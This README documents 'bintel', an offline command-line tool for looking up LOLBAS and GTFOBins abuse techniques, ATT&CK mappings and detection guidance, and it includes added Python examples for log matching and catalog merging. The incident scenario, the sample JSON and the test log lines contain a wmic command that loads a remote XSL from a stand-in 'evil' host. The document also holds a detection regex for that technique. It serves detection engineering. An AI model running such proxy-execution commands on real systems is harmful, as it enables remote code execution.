Offline CLI for LOLBAS + GTFOBins. Ask "what can this binary be abused for?" and get an answer in your terminal, not in 8 browser tabs.
An incident lands. The command line is `wmic.exe os get /format:"http://evil/p.xsl"`. You need to know — right now — what wmic can do, which ATT&CK technique this maps to, and what detection you should write.
Currently: alt-tab, open lolbas-project.github.io, scroll, ctrl-F, read three sections, copy the ATT&CK ID, alt-tab back.
With bintel:

```sh
$ bintel wmic.exe
```

And you get the abuse techniques, example commands, ATT&CK mappings, and detection notes inline.
Requires Python 3.9+.

```sh
git clone https://github.com/pashasec/bintel.git
cd bintel
./run.sh wmic.exe
```

That's it. `run.sh` creates a virtualenv on first call, installs deps, runs the tool, and is idempotent — subsequent calls just run.
Windows:

```bat
git clone https://github.com/pashasec/bintel.git
cd bintel
run.bat wmic.exe
```

Out of the box, bintel ships with a curated catalog of 15 of the most operationally important LOTL binaries. Run `bintel update` once to pull the full ~190 LOLBAS + ~370 GTFOBins entries into your local cache (`~/.bintel/cache.json`).
```sh
bintel <name>                       # detailed view of one binary
bintel show <name> [--json]         # same as above, explicit
bintel search <query> [--platform windows] [--attck T1218] [--json]
bintel list [--platform linux] [--attck T1059]
bintel update                       # fetch latest LOLBAS + GTFOBins
bintel info                         # catalog + cache stats
```

```sh
bintel certutil.exe                     # the canonical LOTL downloader
bintel search downloader                # find every entry tagged as a downloader
bintel search xsl --platform windows    # AWL-bypass primitives
bintel list --attck T1218               # every System Binary Proxy Execution variant
bintel list --platform linux --json     # pipe to jq for custom reports
```

| Field | Source |
|---|---|
| Name + platform (windows / linux) | LOLBAS / GTFOBins |
| Categories (Execution, Download, SUID, Sudo, ...) | both |
| MITRE ATT&CK technique IDs | LOLBAS |
| Abuse techniques: name + command + notes | both |
| Detection guidance (process name, command-line patterns) | LOLBAS + curated |
| Resource links back to upstream | both |
`bintel show <name> --json` emits a stable JSON schema you can pipe into SIEM, Splunk, or your own detection-engineering workflow.
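As an added example of what "pipe into your detection-engineering workflow" can look like (this is not bintel's own code), the script below takes a `show --json` document, compiles its detection guidance into matching rules, and runs them over JSON-lines command-line telemetry. The README does not specify the exact JSON layout, so the field names inside `detection` (`process`, `cmdline_pattern`) and the shape of the log events are assumptions; the sample document and the log lines are constructed here, with the command line taken from the incident scenario at the top of this README.

```python
"""Added example (not part of bintel): turn the detection guidance from a
`bintel show <name> --json` document into a matcher over command-line logs.

Assumed layout (not specified in the README): the document carries the fields
the README lists (name, platform, categories, attck, functions, detection,
resources) and each `detection` entry is a dict with a `process` name and a
regular-expression `cmdline_pattern`. Log events are one JSON object per line
with `image` (full path) and `cmdline` keys, as an EDR/Sysmon export would give.
"""
import json
import re

# Constructed stand-in for `bintel show wmic.exe --json` output.
SAMPLE_SHOW_JSON = json.dumps({
    "name": "wmic.exe",
    "platform": "windows",
    "categories": ["Execution", "AWL Bypass"],
    "attck": ["T1218"],
    "functions": [
        {"name": "XSL script processing",
         "command": 'wmic.exe os get /format:"http://evil/p.xsl"',
         "notes": "Loads and runs a remote XSL stylesheet."},
    ],
    "detection": [
        # Assumed field names; the pattern flags wmic fetching a stylesheet over HTTP(S).
        {"process": "wmic.exe", "cmdline_pattern": r'/format:\s*"?https?://'},
    ],
    "resources": ["https://lolbas-project.github.io/"],
})

# Constructed JSON-lines telemetry; line 1 is the README's incident command line.
SAMPLE_LOG = [
    json.dumps({"host": "ws01", "image": "C:\\Windows\\System32\\wbem\\wmic.exe",
                "cmdline": 'wmic.exe os get /format:"http://evil/p.xsl"'}),
    json.dumps({"host": "ws01", "image": "C:\\Windows\\System32\\cmd.exe",
                "cmdline": "cmd.exe /c dir"}),
    # Benign inventory use of wmic: process matches, command line does not.
    json.dumps({"host": "ws02", "image": "C:\\Windows\\System32\\wbem\\wmic.exe",
                "cmdline": "wmic.exe os get caption"}),
    # Same technique as line 1 with different casing; the matcher must not be
    # case-sensitive on either the image name or the command line.
    json.dumps({"host": "ws03", "image": "C:\\WINDOWS\\SYSTEM32\\WBEM\\WMIC.EXE",
                "cmdline": 'WMIC.EXE OS GET /FORMAT:"HTTP://evil/p.xsl"'}),
]


def compile_rules(show_json):
    """Compile one binary's detection entries into (binary, process, regex, attck) rules."""
    doc = json.loads(show_json)
    rules = []
    for entry in doc["detection"]:
        rules.append({
            "binary": doc["name"],
            "process": entry["process"].lower(),
            "pattern": re.compile(entry["cmdline_pattern"], re.IGNORECASE),
            "attck": tuple(doc["attck"]),
        })
    return rules


def _image_basename(path):
    """Return the lower-cased file name of a Windows or POSIX image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan_log(rules, log_lines):
    """Return one hit per matching event: (line_no, binary, pattern, attck ids).

    A rule fires only when the process name matches AND the command-line
    pattern matches, so ordinary use of the binary is not flagged.
    """
    hits = []
    for line_no, raw in enumerate(log_lines, start=1):
        event = json.loads(raw)
        image = _image_basename(event.get("image", ""))
        cmdline = event.get("cmdline", "")
        for rule in rules:
            if image == rule["process"] and rule["pattern"].search(cmdline):
                hits.append((line_no, rule["binary"], rule["pattern"].pattern, rule["attck"]))
    return hits


if __name__ == "__main__":
    for line_no, binary, pattern, attck in scan_log(compile_rules(SAMPLE_SHOW_JSON), SAMPLE_LOG):
        print(f"line {line_no}: {binary} matched /{pattern}/ -> ATT&CK {', '.join(attck)}")
```

Gating on the process name as well as the command-line pattern is what keeps the benign `wmic.exe os get caption` event quiet; the fourth event shows why both comparisons are case-insensitive.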
If you want bintel on your PATH instead of `./run.sh`:

```sh
# Recommended: pipx (managed venv, command available everywhere)
pipx install -e .

# Or: classic virtualenv
python3 -m venv .venv && source .venv/bin/activate
pip install -e .

bintel wmic.exe
```

PyPI release is planned; for now install from source.
- Builtin catalog (`bintel/data/builtin.json`) — 15 curated entries that ship with the package. Works offline immediately.
- Update cache (`~/.bintel/cache.json`) — populated by `bintel update`, fetched from the public LOLBAS and GTFOBins JSON endpoints. Cache shadows builtin per-name, so updates pick up upstream fixes.
- Normalized schema — both sources are mapped to the same `Binary { categories, attck, functions, detection, resources }` shape, so downstream tooling doesn't care where an entry came from.
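The following is an added example (not bintel's own implementation) of the two-layer catalog described above: a builtin layer and an update cache are merged into one lookup, cache entries shadow builtin entries with the same name, and the result is filtered the way `bintel list --platform` and `bintel search --attck` / `bintel search <query>` do. The key names follow the normalized shape named in this README plus `name` and `platform`; the file layout, the per-entry `_source` marker and both catalogs' contents are assumptions constructed for the example, not the shipped data.

```python
"""Added example (not part of bintel): merge builtin catalog + update cache
with per-name shadowing, then apply list/search-style filters.

Assumed entry shape (normalized Binary from the README, plus name/platform):
  {name, platform, categories, attck, functions, detection, resources}
Both catalogs below are constructed samples; commands are omitted from the
function entries on purpose.
"""
import json

# Constructed stand-in for bintel/data/builtin.json.
BUILTIN_JSON = json.dumps([
    {"name": "certutil.exe", "platform": "windows", "categories": ["Download"],
     "attck": ["T1218"], "functions": [{"name": "Download file", "command": "", "notes": ""}],
     "detection": [], "resources": []},
    {"name": "wmic.exe", "platform": "windows", "categories": ["Execution"],
     "attck": ["T1218"], "functions": [], "detection": [], "resources": []},
])

# Constructed stand-in for ~/.bintel/cache.json after `bintel update`:
# an upstream fix to wmic.exe (extra category, resource link) and one
# GTFOBins entry, which carries no ATT&CK ids because those come from LOLBAS only.
CACHE_JSON = json.dumps([
    {"name": "wmic.exe", "platform": "windows", "categories": ["Execution", "AWL Bypass"],
     "attck": ["T1218"], "functions": [], "detection": [],
     "resources": ["https://lolbas-project.github.io/"]},
    {"name": "find", "platform": "linux", "categories": ["SUID", "Sudo"],
     "attck": [], "functions": [], "detection": [], "resources": ["https://gtfobins.github.io/"]},
])


def load_catalog(builtin_json, cache_json=None):
    """Merge the two layers into {lower-cased name: entry}.

    The cache is applied second, so a cache entry replaces the builtin entry
    of the same name (per-name shadowing). `_source` records which layer won.
    """
    layers = [(json.loads(builtin_json), "builtin")]
    if cache_json:
        layers.append((json.loads(cache_json), "cache"))
    catalog = {}
    for entries, source in layers:
        for entry in entries:
            catalog[entry["name"].lower()] = dict(entry, _source=source)
    return catalog


def lookup(catalog, name):
    """`bintel <name>`: case-insensitive lookup of one binary, or None."""
    return catalog.get(name.lower())


def filter_entries(catalog, platform=None, attck=None, query=None):
    """`bintel list` / `bintel search` filters: platform, ATT&CK id, and a
    free-text query matched against name, categories and function names."""
    matches = []
    for entry in catalog.values():
        if platform and entry["platform"] != platform:
            continue
        if attck and attck.upper() not in entry["attck"]:
            continue
        if query:
            haystack = [entry["name"], *entry["categories"],
                        *(fn["name"] for fn in entry["functions"])]
            if not any(query.lower() in field.lower() for field in haystack):
                continue
        matches.append(entry)
    return sorted(matches, key=lambda e: e["name"])


if __name__ == "__main__":
    catalog = load_catalog(BUILTIN_JSON, CACHE_JSON)
    for entry in filter_entries(catalog):
        print(f"{entry['name']:<14} {entry['platform']:<8} {entry['_source']:<8} "
              f"attck={entry['attck']} categories={entry['categories']}")
```

Because shadowing is keyed on the lower-cased name, `bintel WMIC.EXE` and `bintel wmic.exe` resolve to the same entry, and a catalog loaded without a cache still answers from the builtin layer alone.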
```sh
pip install -e ".[dev]"
pytest
```

- Sigma rule generation from the `detection` field
- Splunk / Elastic / KQL query generation
- `bintel diff` — show what changed between two `bintel update` runs
- `bintel grep <pattern>` — point at a log file, highlight every LOTL invocation found
- Tab completion for binary names
PRs welcome.
The catalog content comes from two outstanding community projects that you should star:
- LOLBAS Project — Windows Living Off The Land Binaries, Scripts and Libraries. Maintained by @Oddvarmoe and contributors.
- GTFOBins — Unix binaries that can be exploited to bypass local security restrictions. Maintained by @norbemi, @cyrus_and, and contributors.
bintel is a CLI wrapper around their work. The research and catalog they maintain is what makes this tool useful.
MIT — see LICENSE.
Part of the 30 tools in 30 days challenge.